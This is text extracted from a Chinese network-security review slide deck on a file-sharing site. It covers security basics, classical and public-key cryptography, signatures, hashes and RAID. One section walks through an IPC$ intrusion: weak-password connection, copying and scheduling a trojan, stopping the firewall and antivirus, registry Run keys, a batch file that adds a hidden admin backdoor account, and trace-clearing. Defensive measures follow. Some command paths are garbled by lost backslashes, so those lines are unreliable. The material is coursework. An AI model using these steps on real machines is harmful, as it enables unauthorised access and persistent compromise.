《网络安全总复习》PPT课件.ppt_第1页
《网络安全总复习》PPT课件.ppt_第2页
《网络安全总复习》PPT课件.ppt_第3页
《网络安全总复习》PPT课件.ppt_第4页
《网络安全总复习》PPT课件.ppt_第5页
已阅读5页,还剩105页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

网络安全,网络安全:从本质上讲,网络安全就是网络上的信息安全,是指网络系统的硬件、软件和系统中的数据受到保护,不受偶然的或者恶意的攻击而遭到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断; 广义上讲,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全所要研究的领域。,信息的安全需求,机密性 (Confidentiality): 防止未授权者读取信息。(数据加密、访问控制、防计算机电磁泄漏等安全措施) 完整性 (Integrity): 保证计算机系统中的信息处于“保持完整或一种未受损的状态”,禁止未经授权地对信息进行修改。 可用性 (Availability): 合法用户在需要的时候,可以正确使用所需的信息而不遭服务拒绝。,信息的安全需求,不可否认性(Non-repudiation) 发送方和接收方不能抵赖所进行的传输 可控性(controllability) 对信息的传播和内容具有控制能力,钓鱼网站 一种网络欺诈行为,指不法分子利用各种手段,仿冒真实网站的URL地址以及页面内容,或者利用真实网站服务器程序上的漏洞在站点的某些网页中插入危险的HTML代码,以此来骗取用户银行或信用卡账号、密码等私人资料。,什么是钓鱼网站,通信过程中的四种攻击方式,图1-1,拒绝服务攻击(DoS),DoS-Denial of Service: 用超出被攻击目标处理能力的海量数据包消耗可用系统、带宽资源等方法的攻击。 导致服务器不能正常为合法用户提供服务的攻击。,攻击者,目标主机,等待应答,SYN:同步 SYN/ACK:同步/确认 ACK:确认,SYN攻击的原理(1),攻击者,目标主机,1,n,等待ACK应答,不应答,不应答,重新发送,SYN攻击的原理(2),PDRR安全模型,信息安全保障的PDRR模型的内涵已经超出了传统的信息安全保密,而是保护(Protection)、检测(Detection)、响应(Reaction)和恢复(Restore)的有机结合。,安全技术评价标准,1983年美国国防部颁布了安全标准5200.28:可信计算系统评估准则 Trusted Computing SystemEvaluation Criteria,即桔皮书。 TCSEC 共分为如下4类7级: (1) D级,安全保护欠缺级。 (2) C1级,自主安全保护级。 (3) C2级,受控存取保护级。 (4) B1级,标记安全保护级。 (5) B2级,结构化保护级。 (6) B3级,安全域保护级。 (7) A1级,验证设计级。,密码学,第13页,密码的目标,对于任何一个密码系统,其目标都是: 只有掌握密钥的情况下才能将密文恢复成明文。 即:攻击者即使掌握了密码算法的全部细节和其他信息,仍然不能在没有密钥的情况下恢复明文。,第14页,加密函数E作用于M得到密文C,用数学表示为: E(M)=C. 相反地,解密函数D作用于C产生M D(C)=M.,密码体系示意图,第15页,古典密码,简单代替密码 双重置换密码 一次一密 电子本密码,第16页,简单代替密码,简单代替密码的简单实现 就是将明文按照字母表中当前字母后移N位加密产生的。 通过查找明文行中的字母,并用密文行中对应的字母进行代替。,第17页,简单代替密码,简单代替密码的解密 通过查找密文行中的字母,并用明文行中对应的字母进行代替。 移动3位的简单代替密码,称为凯撒(Caesar)密码,第18页,Ceasars Cipher Decryption,Plaintext: spongebobsquarepants,Plaintext,Ciphertext,Suppose we know a Ceasars cipher is being used: Given ciphertext: VSRQJHEREVTXDUHSDQWV,第19页,2.2.1 简单代替密码,如果限定简单代替就是字母表 则所有可能的密钥n是025。 若攻击者截获密文CSYEVIXIVQMREXIH 则攻击者能够尝试所有26种可能的密钥,来解密密文,并判断所解密文是否具有意义。,第20页,什么是蛮力破解?,通过尝试所有可能的密钥直至遇到正确的密钥,即穷举搜索密钥。 所以密钥数应该足够大,以使得攻击者在合理的时间范围内没有办法穷举。,蛮力破解,第21页,双重置换密码,双重置换密码的简单实现 首先将明文写成给定大小的矩阵形式,然后根据特定的置换规则进行行和列的置换。,第22页,Double Transposition,Plaintext: attackxatxdawn,Permute rows and columns,Ciphertext: xtawxnattxadakc Key is matrix size and permutations: (3,5,1,4,2) and (1,3,2),第23页,密码编码学分类,对称密码-Symmetric Key 公钥密码- Public Key Hash函数- Hash algorithms,第24页,3.1 对称密钥密码,对称密钥密码: 提供一个双向信道:A和B共享一个秘密密钥,双方既能加密信息发送给对方,也可以解密从对方得到的密文信息。,第25页,3.1 对称密钥密码,加密,解密,明文P,密文C,明文P,密钥(K),对称密码体制(symmetric cryptosystem) 加密密钥和解密密钥是相同的,C=E(K,P),P=D(K, E(K,P),第26页,3.1 对称密钥密码,按照明文的处理方法分 分组密码(block cipher) 流密码(stream cipher),第27页,3.3.2 数据加密标准-DES,数据加密标准Data Encryption Standard: 是20世纪70年代提出的 是基于IBM公司提出的Feistel结构的Lucifer密码设计的 DES后来成为美国政府的官方标准 DES是第一代公开的、完全说明细节并完全商业化得现代加密技术,并被世界公认。,第28页,DES 算法简介(了解),DES是分组密码,明文分组长度为64 bits (8 bytes) 密钥长度为64 bits,有8 bits奇偶校验,有效密钥长度为56 bits。 算法主要包括: 初始置换 IP (Initial Permutation ) 16轮迭代的乘积变换 逆初始置换 IP-1 16个子密钥产生器。,第29页,IP,L0,R0,L1=R0,R1= L0f(R0,K1),R2= L1f(R1,K2),L2= R1,明文,L15= R14,R16= L15f(R15,K16),R15= L14f(R14,K15),L16=R15,IP-1,密文,f,K1,f,K2,f,K16,DES加密流程图,第30页,4.1 公钥密码,公钥密码: 非对称加密算法(Asymmetric Algorithm)也称公开密钥算法(Public Key Algorithm),双钥密码。 对称密钥密码系统和非对称密钥密码系统将会同时共存,并继续为公众提供服务。它们是相互补充的,一种系统的优势可以弥补另一种系统的劣势。,第31页,对称密码的不足,密钥管理量的困难 传统密钥管理:两两分别用一个密钥时,则n个用户需要C(n,2)=n(n-1)/2个密钥,当用户量增大时,密钥空间急剧增大。 密钥必须通过某一信道传输,对这个信道的安全性的要求比正常的传送消息的信道的安全性要高 数字签名的问题 传统加密算法无法实现抗抵赖的需求。,第32页,4.1 公钥密码,对称密钥密码,加密和解密使用同一密钥。 公钥密码,加密中使用一个密钥(可以公开,叫公钥),解密使用另外一个密钥。 公钥密码解决了对称密码中,如何安全地进行密钥分配的问题,第33页,4.1 非对称密钥密码,加密,解密,明文P,密文C,明文P,加密密钥Ke,解密密钥Kd,C=E(Ke,P),P=D(Kd, E(Ke,P),非对称密码体制(asymmetric cryptosystem) 加密密钥和解密密钥是成对出现 加密过程和解密过程不同,使用的密钥也不同,第34页,对称、非对称密钥密码系统,两种系统在概念上的不同,基于保存秘密方法不同。 对称密钥密码系统中,秘密必须在两个人之间共享 非对称密钥密码系统中,秘密是个人独享的,每个人都创建并保存自己的秘密。 在一个有n个人的组织中,对称密钥密码系统,需要有n(n-1)/2个共享秘密。对于非对称密钥密码系统,只需要n个个人秘密。 对于一个有一百万人的组织来说,对称密钥密码系统需要五亿个共享秘密;非对称密钥密码系统需要一百万个个人秘密。,第35页,对称、非对称密钥密码系统,加密之外,其他安全方面的问题需要运用非对称密钥密码系统,如:公正和数字签名(基于个人秘密的应用程序)。 对称密钥密码系统基于符号(字符或比特)的代换和置换,非对称密钥密码系统则基于把数学函数应用于数字。 即在非对称密钥密码系统中,明文和密文都是数字,加密和解密就是把数学函数应用于数字以创建另外一些数字的过程。,第36页,双方的需要,非对称密钥密码系统是用数学函数进行加密和解密,比对称密钥密码系统要慢得多,对于大信息的加密,对称密钥密码系统还是需要的。 在公证、数字签名和密钥交换等方面需要非对称密钥密码系统。 今天为了能够利用安全的各个方面,既需要对称密码密码系统,也需要非对称密码系统。是相互补充的。,第37页,公钥密码的特点,加密与解密的密钥不同 公钥密码的密钥是一组密钥对(公钥,私钥) 可以公开的密钥称为公钥,必须保密的密钥称为私钥。 知道密码算法和公钥,从公钥得到私钥在计算上是不可行的 两个密钥配对使用 公钥加密信息,私钥解密信息 私钥签名信息,公钥验证签名,第38页,公钥密码的加密,明文,明文,Hi Bob Alice,B 的私钥,密文,Alice,Bob,A加密,B解密,Hi Bob Alice,Hi Bob Alice,Hi Bob Alice,公开,保密,B 的公钥,第39页,4.1 公钥密码,公钥密码体制是基于“单向陷门函数”的。 单向陷门函数是满足下列条件的函数f: (1) 给定x,计算y=f (x)是容易的; (2) 给定y, 计算x使x=f-1(y)是不可行的。 (3) 存在k,已知k 时,对给定的任何y,若相应的x存在,则计算x使fk-1(y)是容易的。 即:给出y和陷门K(秘密),很容易计算x。,第40页,4.1 公钥密码-单向陷门函数,单向陷门函数。 即一个函数正向计算很容易; 但是反向计算则十分困难。 陷门的目的是确保攻击者不能使用公开的信息得出秘密的信息。 如:计算两个素数p和q的乘积N=pq很容易,但是给定N(如果N很大)分解它的因子p和q则是困难的。,第41页,4.1 公钥密码,Bob拥有公钥和私钥组成的密钥对 任何人都可以使用Bob的公钥加密消息给Bob; 但只有Bob本人才能对消息进行解密; 应为只有Bob拥有私钥。,第42页,4.1 公钥密码,Bob拥有公钥和私钥组成的密钥对 Bob能够使用他的私钥进行“加密”得到消息M的签名; 任何人都可以使用Bob的公钥“解密”这条消息; 这是公钥密码最有用的特性之一。,第43页,公钥密码的签名,文件,A签名的文件,Hi Bob Alice,A 的公钥,A 的私钥,签名文件,Alice,Bob,A签名,B验证,Hi Bob Alice,保密,公开,第44页,4.3 RSA,RSA公钥加密算法是1977年由Rivest、Shamirh和Adleman在(美国麻省理工学院)开发的。 RSA取名来自开发他们三者的名字。 RSA是目前应用最广泛的公钥密码算法,它能够抵抗到目前为止已知的所有密码攻击,已被ISO推荐为公钥数据加密标准。,第45页,4.3 RSA,RSA算法 基于一个十分简单的数论事实:将两个大素数相乘十分容易,但要对其乘积进行因式分解却极其困难,因此可以将乘积公开作为加密密钥。,第46页,RSA算法,选择两个大素数p和q,并计算乘积 N = pq 选择与(p1)(q1)互素的整数e 并求解模(p1)(q1)的e的乘法逆,记为d 即ed = 1 mod (p1)(q1) Public key is (N,e) Private key is d,第47页,DES和RSA算法的特点和比较,(1) DES的特点 可靠性较高 (16轮变化,增大了混淆性和扩散性,输出不残存统计信息); 加密/解密速度快; 算法容易实现 (可由软件和硬件实现,硬件实现速度快),通用性强; 算法具有对称性,密钥位数少,存在弱密钥和半弱密钥,便于穷尽攻击; 密钥管理复杂。,第48页,(2) RSA算法的特点 密钥管理简单 (网上每个用户仅保密一个密钥,且不需密钥配送); 便于数字签名; 可靠性较高 (取决于分解大素数的难易程度); 算法复杂,加密/解密速度慢, 难于实现。,DES和RSA算法的特点和比较,第49页,4.4 公钥密码的应用,公钥密码与对称密码相比有两个优点: 使用公钥密码,不需要实现共享密钥。 使用公钥密码,进行数字签名,不仅能提供完整性,还能够提供不可否认性。,第50页,规定符号,(签名)Sign message M with Alices private key: MAlice (加密)Encrypt message M with Alices public key: MAlice Then MAliceAlice = M MAliceAlice = M,第51页,秘密性和不可否认性,假设Alice想发送消息M给Bob,出于秘密性的考虑, Alice使用Bob的公钥对M加密: MBob 为了确保完整性和不可否认性,她使用她的私钥对M签名。 采用如下两种方法哪一种呢? Sign and encryptMAliceBob Encrypt and signMBobAlice 两种操作顺序对安全性有无影响?,第52页,场景一,假设Alice和Bob正在热恋,Alice决定发送消息M=“I love you”给Bob 使用先签名后加密,她发送MAliceBob 给Bob 不久之后, Alice和Bob出现感情危机,出于恶意,Bob收到后解密获得签名的消息MAlice,并将其加密为MAliceCharlie ,并将消息发送给Charlie 于是Charlie以为Alice爱上了他 这个误会使得Charlie和Alice之间很尴尬,第53页,Sign and Encrypt,Alice,Bob,MAliceBob,Q: What is the problem? A: Charlie misunderstands crypto!,Charlie,MAliceCharlie,M = “I love you”,第54页,场景二,Alice通过此事得到教训,再也不采用先签名再加密的方法 当她需要同时实现秘密性和不可否认性时,她选择先加密再签名 一段时间之后, Alice和Bob感情复合,Alice获得重要考古发现,要告诉Bob MBobAlice 发送给Bob 然而Charlie对于上次的愚弄很生气,他能偶截获Alice的消息并进行攻击 Charlie使用Alice公钥计算出MBob,第55页,场景二,并用自己的私钥签名后发给Bob Bob收到消息后,认为重大考古是Charlie发现的,并立即给Charlie颁发奖金 Alice听说后,发誓再也不用先加密再签名的方法了 那该怎么办呢?,第56页,Encrypt and Sign,Alice,Bob,MBobAlice,Note that Charlie cannot decrypt M Q: What is the problem? A: Bob misunderstands crypto!,Charlie,MBobCharlie,M = “My theory, which is mine.”,数字签名的实现,目前应用最广泛的数字签名加解密算法是RSA 因RSA的公钥、私钥太长太复杂,不便于记忆和管理,一般以文件的形式存储,该文件同时还包含用户的个人信息,真正实现“个人签名”的效果。一般把这种文件称为数字证书。,数字证书之所以可以称之为“证书”,就一定要有“防伪”功能。因为证书中要包含用户的个人身份信息(如姓名、单位,电子邮件等),并且最重要的,还有用户的密钥。试想一下,如果任何人都可以自定义信息并发布证书,谁能保证真伪呢? 就像现实生活中的个人身份一样,任何人都能认证么?,数字证书引入,因此,正如身份证由国家权威部门(公安部)来颁发。 让我们重新定义数字证书,数字证书是由一个权威机构发行的,至少包含一个公钥、证书持有人(或单位)的名称以及证书授权中心对这些信息的数字签名的文件。一般情况下证书中还包括密钥的有效时间,发证机关(证书授权中心)的名称,该证书的序列号等信息。,数字证书Digital Certificate,数字证书就相当于互联网上的通信双方的 身份证,颁发数字证书的机构称为 CA(Certificate Authority ,即认证中心) 是在电子交易中承担安全认证服务,签发数字证书,确认用户身份等工作的互联网上具有权威性和公正性的一个普遍可信的第三方服务机构。 类似生活中颁发身份证的公安部门,数字证书的获取,课前回顾,采用数字签名,应该实现的功能: 保证信息是由签名者自己签名发送的, 签名者不能否认或难以否认。 保证信息自签发后到收到止未作任何改动,签发的文件是真实完整的。,数字签名的功能,一个简单的数字签名原理,从理论上说,采用公钥体制技术进行的应用, 其实就是一个签名签证的过程。即: 发送方用私钥对某个文件进行加密(签名), 接收方利用发送方的公钥进行解密(验证)。,为何 采用对称密码技术的应用就不能称为签名呢? 就是因为 加解密密钥相同,无法实现身份验证。 但非对称密码技术加解密密钥不同, 可以实现“公钥/私钥”密钥对的唯一性。,研究非对称密码技术(如RSA)的理论模型,我们知道,其加解密速度是很慢的,尤其不适合数据量大的加解密。如何改进呢?,简单签名面临的问题,Hash函数,Hash,一般翻译做“散列”,也有直接音译为“哈希”的,也叫杂凑函数,就是把任意长度的输入信息通过特定的算法,变换成固定长度的输出值(也称摘要)。 因此,Hash算法属于典型的压缩映射。,Hash函数必须满足以下特征: 任意长度的输入值,生成固定长度的输出值 不同的输入,一定生成不同的输出。 不可能从输出值来确定输入信息,即不可逆,计算机实体安全,磁盘阵列(RAID)配置,磁盘阵列配置,Redundant Array of Independent Disks 独立磁盘冗余阵列,简称磁盘阵列。,XX公司,更高的存储性能,自动备份、数据恢复能力,简单的说,RAID是一种把多块独立的硬盘(物理硬盘)按不同方式组合起来形成一个硬盘组(逻辑硬盘),从而提供比单个硬盘更高的存储性能和提供数据冗余的技术。 组成磁盘阵列的不同方式称为RAID级别(RAID Levels)。,RIAD及RIAD Levels,RAID Levels RAID 0,RAID0 连续以位或字节为单位分割数据,并行读/写于多个磁盘上。没有校验数据,只是单纯地提高性能,并没有为数据的可靠性提供保证,,优点:1.是最快,最有效率的阵列类型;2.没有容量损失(所有的存储空间都可用)。,缺点:没有容错能力。一个磁盘出错导致损失所有阵列内的数据。,典型应用:特别适用于对性能要求较高,而对数据安全不太在乎的领域,如图形工作站等。对于个人用户,RAID 0也是提高硬盘存储性能的绝佳选择。,RAID Levels RAID 1,RAID1 镜像(每两个硬盘的内容一模一样 ) 需要至少两块硬盘,优点:1.对数据进行了完全的备份,其可靠性是最高的 2.读取性能较单磁盘高。,缺点:空间利用率只有50%。,典型应用:随机数据写入,要求安全性高,如服务器、数据库存储领域。,RAID Levels RAID 5,RAID5 有校验数据,提供数据容错能力 至少需要3块硬盘,最好使用相同容量相同速度的硬盘 校验值分散在各个盘的不同位置,相当程度的分散了负载,故有较好的性能,,优点:会实现RAID 0的高速存储读取并且也会实现RAID1的数据恢复功能 。,缺点:一般需要价格昂贵的硬件设备raid卡。,典型应用:要求存储性能、数据安全和存储成本兼顾的领域,如金融、银行和股市的联机交易系统(OLTP)。,网络入侵,IPC$入侵 Internet Process Connection,IPC$ 可以被理解为一种“专用管道”,可以在连接双方建立一条安全 的通道,实现对远程计算机的访问。简单说就是一个特殊的共享资源。,IPC$入侵是利用IPC$共享和弱口令实现对远程计算机非授权访问的一种入侵方法。,入侵前奏,备注: 可事先使用IP扫描、 端口扫描等方面的软件 确定活动主机的IP 及139、445端口 是否开放,第一步:建立连接,语法: net use IP地址(或计算机名)IPC$ “密码” /user:“用户名” 例如: net use 192.168.56.101ipc$ “123” /user:“administrator”,第二步:操控远程计算机,只要第一步顺利完成,你就有操控远程计算机的权限了。比如: 查看远程计算机的硬盘内容 向远程计算机上复制文件(如木马程序,脚本命令文件等) 远程计算机上的服务控制 远程计算机上的进程查看和终止(如关闭防火墙软件、杀毒软件等) 在远程计算机上创建用户账户(一般为下次入侵的后门账户) 重启(关闭)远程计算机 修改远程计算机的注册表 “打扫战场”(清理入侵痕迹),查看远程计算机的内容,使用net view查看网络中的共享资源 使用net use(推荐),例如: net use Z: 192.168.56.101c$ net use Y: 192.168.56.101admin$,向远程计算机复制文件,使用“我的电脑” 使用copy命令(最好掌握),例如: copy c:muma.exe Y:system32,远程计算机上运行程序,任务计划可以采用交互式方式添加,也可使用命令 at(最好掌握) 最常用法:at 远程计算机IP 运行的时间 命令或程序 如:at 192.168.56.101 16:35 c:windowsmuma.exe,备注: 如何得知远程计算机的当前时间呢? 可用 net time 命令,如: net time 192.168.56.101,远程计算机上的服务控制,对于网络入侵而言,对远程计算机上的服务控制显得十分重要。 如关闭其防火墙,打开其任务调度等等,便于你更好的控制入侵的主机 一般有2种方式:一是用图形界面操作,即用本机的服务控制台程序,如下图 二是用命令 sc(推荐),sc 命令最常用法,sc start 服务名 如:sc start lanmanserver 开启文件共享服务 sc stop 服务名 如:sc stop SharedAccess 关闭内置防火墙 sc config 服务名 start= (auto / disabled) 配置某个服务的启动类型(自动启动、已禁用) 如:sc config TlntSvr start= auto (注意:=与值间有一空格),附:常用手法,sc start lanmanserver 开启文件共享服务 sc start RemoteRegistry 开启远程注册表服务 sc start Schedule 开启任务计划服务 sc start Tlntsvr 开启Telnet服务 sc stop SharedAccess 关闭内置防火墙 sc stop wuauserv 关闭安全中心通知 sc stop wscsvc 关闭自动更新,一旦入侵成功,攻击者为了更方便控制远程主机,常采用以下手法: 原则就是:碍事的服务统统关闭,方便之门统统开启,远程计算机上的进程查看和终止,众所周知,欲查看本机正在运行的程序或进程,可使用“任务管理器” 如何操纵远程主机上正运行的程序或进程呢?,远程计算机上的进程查看,使用命令 tasklist:查看运行的程序或进程 tasklist /s 远程主机IP /u 用户名 /p 密码,远程计算机上的进程终止,taskkill /s 远程主机IP /u 用户名 /p 密码 /pid 进程ID号,这个命令很实用,常用于关闭远程主机中 “妨碍你”的程序,如杀毒软件、防火墙软件等 但也要注意,现在很多安全防护软件也道高一尺了。,注册表入侵,注册表(Registry)是Windows中的一个重要的数据库 用于存储系统和应用程序的设置信息。,注册表入侵(regedit),注册表中有个很重要的区域,储存有开机自动运行的程序 HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun,注册表入侵,接前面内容,如果想让远程计算机执行某个特定程序,也可以通过注册表中添加启动项的方式来实现。 注册表编辑器(regedit)不仅可修改本地计算机上的注册表,也可以修改到远程计算机上的注册表,注册表入侵简易防范,通过注册表,可以修改、删除计算机上的应用程序设置 因此攻击者也多了一种入侵的手段。 一种简易防范措施就是 禁用Remote Registry服务,预留后门,一般来说,入侵一旦得手,攻击者往往希望日后也能再次光临,为了以防万一,攻击者经常预留后门。如创建新账户,开设新的隐藏共享等等。,附参考样板(把以下内容存为批处理文件Sys.bat) net user IUSR_Internet 123456 /add net localgroup administrators IUSR_Internet /add sc config lanmanserver start= auto sc start lanmanserver net share admins$=%windir%,备注:注意每个环节的命名技巧,即尽量伪装得真实些,重启、关闭远程计算机,命令:shutdown 用法一:shutdown -i 调出图形界面,shutdown -r 重启 -s 关机 -t xxx秒 倒计时显示 -m 远程主机IP shutdown s t 10 m 192.168.56.101,清除入侵痕迹,为了掩人耳目,常常需要做善后处理,即清除入侵痕迹。 如 删除上传过的无用文件,及时断开连接等。 net use * /del /y,IPC$入侵防范措施,根据实际情况,一般常用的防范措施有: 停用默认共享,即C$、ADMIN$等 net share c$ /del net share admin$ /del 关闭文件共享服务,即Server服务 彻底断绝一切共享服务功能 折中方案:需要开启共享服务时,在防火墙例外规则中允许“文件和打印机共享”,反之则关闭。 归根结底,最佳方案就是为用户账户设置强密码,缓冲区溢出,概念,缓冲区溢出指的是一种系统攻击的手段,通过向程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其它指令,以达到攻击的目的。,原因,造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。缓冲区溢出就是将一个超过缓冲区长度的字符串置入缓冲区的结果,后果,向一个有限空间的缓冲区中置入过长的字符串可能会带来两种后果 一是过长的字符串覆盖了相邻的存储单元,引起程序运行失败,严重的可导致系统崩溃; 另一种后果是利用这种漏洞可以执行任意指令,甚至可以取得系统特权,由此而引发了

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论